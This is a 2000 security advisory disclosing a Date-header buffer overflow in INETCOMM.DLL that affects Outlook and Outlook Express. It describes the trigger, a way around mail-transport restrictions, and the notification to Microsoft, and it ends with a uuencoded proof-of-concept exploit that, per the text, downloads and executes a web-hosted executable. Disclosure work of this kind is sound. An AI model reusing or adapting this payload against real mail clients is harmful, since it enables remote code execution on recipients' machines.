outlook.advisory.txt

`_______________________________________________________________  
  
Security Advisory: Buffer Overflow in MS Outlook & Outlook Express Email Clients  
  
Date: 18th July 2000  
Author: Aaron Drew (mailto:[email protected])  
Versions Affected: MS Outlook 97/2000 and MS Outlook Express 4/5  
  
_______________________________________________________________  
  
A bug in a shared component of Microsoft Outlook and Outlook Express mail  
clients can allow a remote user to write arbitrary data to the stack. This  
bug has been found to exist in all versions of MS Outlook and Outlook  
Express on both Windows 95/98 and Windows NT 4.  
  
The vulnerability lies in the parsing of the GMT section of the date field  
in the header of an email. Bound checking on the token representing the GMT  
is not properly handled. This bug can be witnessed by opening an email with  
an exceptionally long string directly preceding the GMT specification in  
the Date header field such as:  
  
Date: Fri, 13 July 2000 14:16:06 +1000xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
The bug lies in the shared library INETCOMM.DLL and has been successfully  
exploited on Windows 95, 98 and NT with both Outlook and Outlook Express.  
  
The execution of this code is performed differently under each client. Under  
Outlook Express, the buffer overflow occurs as soon as the user tries to  
view the mail folder containing email with a malicious date header. Under  
Microsoft Outlook, the overflow occurs when attempting to preview, read,  
reply or forward any email with a malicious date header. Under MS Outlook a  
user may delete or save an email to disk without exploitation.  
  
Whilst some mail transport systems seem to modify 8-bit header data or lines  
over 70 characters in length preventing direct exploitation, these  
restrictions seem to be avoided by encoding a message with an exploit date  
field as a MIME attachment in a Outlook's MIME attached message format.  
These messages also overflow the stack when read, previewed, replied to or  
forwarded.  
  
Microsoft was notified of this bug on July 3.  
  
Attached is a proof-of-point exploit that, when placed in the header  
field of a message or MIME attached message, will download and execute  
an executable from the web. (In this particular case it will launch MS Freecell)  
  
_______________________________________________________________  
  
DISCLAIMER  
  
The information within this document may change without notice. Use of  
this information constitutes acceptance for use in an AS IS  
condition. There are NO warranties with regard to this information.  
In no event shall the author be liable for any consequences whatsoever  
arising out of or in connection with the use or spread of this  
information. Any use of this information lays within the user's  
responsibility.  
  
_______________________________________________________________  
  
  
begin 600 outlookex  
M1&%T93H@4W5N+"`W($UA>2`R,#`P(#$Q.C(P.C0V("LQ,#`PD)"0D)"0D)"0  
MD)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0D)"0-MW#  
M7I"0D)"0D)"0`4#'7@7##("0D)"+Q"UQ_O__B^R0D)"0,\FQH4B`,(#B^I"+  
MZ)"^F!+`7E!0_Q:+\(O=,^V0B_MF@>]__OPSR8#I^Y!#,L#7A,!U^$-14U;_  
M%902P%ZK6>+J0S+`UX3`=?A#4_\5F!+`7HOP,\F#Z?Q#,L#7A,!U^$-14U;_  
M%902P%ZK6>+JD#/`9DC1X)`STE!2_U?LB_`STE)24E)2_U?P,])24E)2B]>!  
MPMS^__^04E#_5_A7,])F2M'B4E90_U?\D)"0,])2B]>!PO;^__]2_U?<_S=6  
M4(O8_U?@4_]7Y)`STD)2B]>!PO;^__^04O]7Z%#_%:P1P%Z0D)"0D)"0D)"0  
MD,O%TL[%S+.R@-_LX_+EX?2`W^SW\NGTY8#?[./L[_/E@-?I[L7XY>.`Q^SO  
MXN'LP>SL[^.`U\G.R<[%U(#)[O3E\N[E],_PY>[!@,GN].7R[N7TP^SO\^7(  
MX>[D[.6`R>[TY?+NY?3/\.7NU?+LP8#)[O3E\N[E]-+EX>3&Z>[email protected]]/"Z  
FKZ^QN;*NL;:XKK"PL:ZPL;"O].7S]*[E^.6`D)"0D)"0D)"0D`H`  
`  
end  
`